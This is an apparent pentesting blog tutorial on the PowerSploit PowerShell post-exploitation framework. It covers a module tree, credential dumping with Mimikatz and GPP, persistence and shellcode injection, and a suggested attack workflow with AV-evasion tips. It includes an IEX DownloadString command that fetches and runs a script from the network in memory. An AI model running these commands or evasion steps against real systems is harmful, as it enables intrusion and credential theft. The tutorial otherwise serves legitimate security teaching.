/ Post-Exploitation, Uncategorized / By

PowerSploit Framework: The Swiss Army Knife of Post-Exploitation

Overview

PowerSploit is a modular post-exploitation framework written in PowerShell, designed for penetration testers and red teamers to interact with Windows environments after gaining initial access. It focuses on privilege escalation, credential access, persistence, reconnaissance, and bypassing security defenses — all using native PowerShell.

Developed by the security community (notably @harmj0y), PowerSploit provides offensive operators with powerful in-memory tools that are flexible, stealthy, and scriptable.

Where It Fits In the Pentester’s Toolkit

Category: Post-Exploitation → PowerShell Frameworks

You typically use PowerSploit after gaining a foothold on a Windows machine:

  • RDP access
  • Reverse shell
  • Evil-WinRM session
  • Compromised credentials

It’s an alternative to tools like Metasploit or Cobalt Strike, specifically tailored to blend in on Windows systems using native scripting (PowerShell).

Key Modules and Capabilities

ModuleDescription
PowerUp.ps1Identifies common privilege escalation paths on Windows
Invoke-Mimikatz.ps1Executes Mimikatz in-memory to dump credentials
Get-GPPPassword.ps1Extracts plaintext credentials from Group Policy Preferences
Invoke-Shellcode.ps1Injects shellcode into memory (bypasses AV by avoiding EXEs)
Add-Persistence.ps1Adds registry or scheduled task persistence
Invoke-ReflectivePEInjection.ps1Reflectively loads DLLs into memory (covert execution)

Each script is modular and can be run individually based on what you want to accomplish.

Why It’s Useful

  • Stealth: Runs entirely in memory (fileless execution)
  • Modular: Use what you need, no bloat
  • Flexible: Easy to modify for evasion or automation
  • Widely Supported: Compatible with common red team tools (e.g., Empire, C2s)

How to Use PowerSploit

1. Import via Web (live session)

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')

2. Import locally (offline mode)

Import-Module .\PowerUp.ps1

3. Run a check

Invoke-AllChecks

This runs multiple privilege escalation checks like unquoted service paths, AlwaysInstallElevated, weak registry keys, and more.

PowerSploit Tool Map: Framework Tree & Use Cases

Here’s a detailed tree map of its modules, tools, and where each fits into your offensive workflow.

PowerSploit Framework Tree

PowerSploit/
├── Recon/                  → Domain & network enumeration
│   ├── PowerView.ps1       → Active Directory enumeration
│   └── Get-NetView.ps1     → Legacy host recon
│
├── Privesc/                → Privilege escalation
│   ├── PowerUp.ps1         → Automated Windows privesc checks
│   ├── Get-ServiceUnquoted.ps1 → Find unquoted service paths
│   ├── Get-RegAlwaysInstallElevated.ps1 → Detect MSI-based SYSTEM escalation
│
├── Exfiltration/           → Data theft and exfiltration
│   ├── Invoke-StealthUserHunter.ps1 → Locate privileged user sessions
│   └── Invoke-TokenManipulation.ps1 → Enumerate and impersonate tokens
│
├── Persistence/            → Establish foothold on reboot
│   ├── Add-Persistence.ps1 → Registry/Startup/Service persistence
│   └── Install-SSP.ps1     → Load SSPs to steal creds at logon
│
├── CodeExecution/          → Shellcode & binary injection
│   ├── Invoke-Shellcode.ps1 → Injects raw shellcode into memory
│   ├── Invoke-DLLInjection.ps1 → Inject DLLs reflectively
│   └── Invoke-ReflectivePEInjection.ps1 → In-memory PE loader
│
├── Credentials/            → Credential dumping & manipulation
│   ├── Invoke-Mimikatz.ps1 → Run Mimikatz in memory
│   ├── Get-GPPPassword.ps1 → Dump GPP-stored plaintext passwords
│   └── Invoke-CredentialInjection.ps1 → Pass-the-Hash, Pass-the-Ticket
│
├── AntivirusBypass/        → Bypass Windows Defender / AVs
│   └── Out-EncodedCommand.ps1 → Obfuscate commands for evasion

Module-by-Module Breakdown

Recon (Enumeration)

  • PowerView.ps1 – The most complete PowerShell-based AD enumeration tool
  • Get-NetView.ps1 – Host-focused enumeration (users, shares, sessions)

Privilege Escalation

  • PowerUp.ps1 – Runs all common escalation checks in one command
  • Get-ServiceUnquoted.ps1 – Detects vulnerable service paths
  • Get-RegAlwaysInstallElevated.ps1 – Identifies SYSTEM escalation vectors via MSI

Code Execution

  • Invoke-Shellcode.ps1 – Inject custom shellcode into memory (no AV trigger)
  • Invoke-ReflectivePEInjection.ps1 – Load executables/DLLs into memory filelessly
  • Invoke-DLLInjection.ps1 – Similar, DLL-specific injection

Credential Access

  • Invoke-Mimikatz.ps1 – Load Mimikatz into memory for dumping creds
  • Get-GPPPassword.ps1 – Extract passwords from old GPO XML files
  • Invoke-CredentialInjection.ps1 – Token impersonation and credential replay

Persistence

  • Add-Persistence.ps1 – Startup, service, and runkey persistence setup
  • Install-SSP.ps1 – Inserts SSP to dump creds at logon (stealthy)

Exfiltration & Targeting

  • Invoke-StealthUserHunter.ps1 – Find where admins are logged in
  • Invoke-TokenManipulation.ps1 – Create, impersonate, or steal tokens

AV Evasion

  • Out-EncodedCommand.ps1 – Obfuscate your payloads to sneak past Defender

Notes for Pentesters

  • PowerSploit scripts can be imported individually, so you can remain stealthy
  • Many of its features are used by tools like Empire and Cobalt Strike
  • Most modules run in-memory → no need to drop files to disk
  • Detection is high on known signatures — obfuscate, rename, or modify functions for real-world ops

Suggested Usage Workflow

  1. Gain initial access (reverse shell, Evil-WinRM, RDP)
  2. Run PowerView to map out users, computers, sessions, groups
  3. Execute PowerUp to check for privilege escalation paths
  4. Use credential modules (e.g. Mimikatz, GPP) to harvest creds
  5. Establish persistence via registry or scheduled tasks
  6. Obfuscate or clean up traces to reduce detection

Detection & Evasion Notes

Because PowerSploit is well-known, it’s heavily monitored by AV/EDR. Use techniques like:

  • Obfuscating the script
  • Renaming functions
  • Running inside memory-only PowerShell sessions
  • Wrapping it with tools like Invoke-Obfuscation

Final Thoughts

PowerSploit is one of the foundational post-exploitation frameworks every Windows-focused pentester should know. While it may be noisy in modern environments without obfuscation, it still forms the basis for many in-house and C2 frameworks.

Use it in labs. Learn the modules. Understand how real-world privilege escalation and credential attacks work under the hood.

Related Posts

Scroll to Top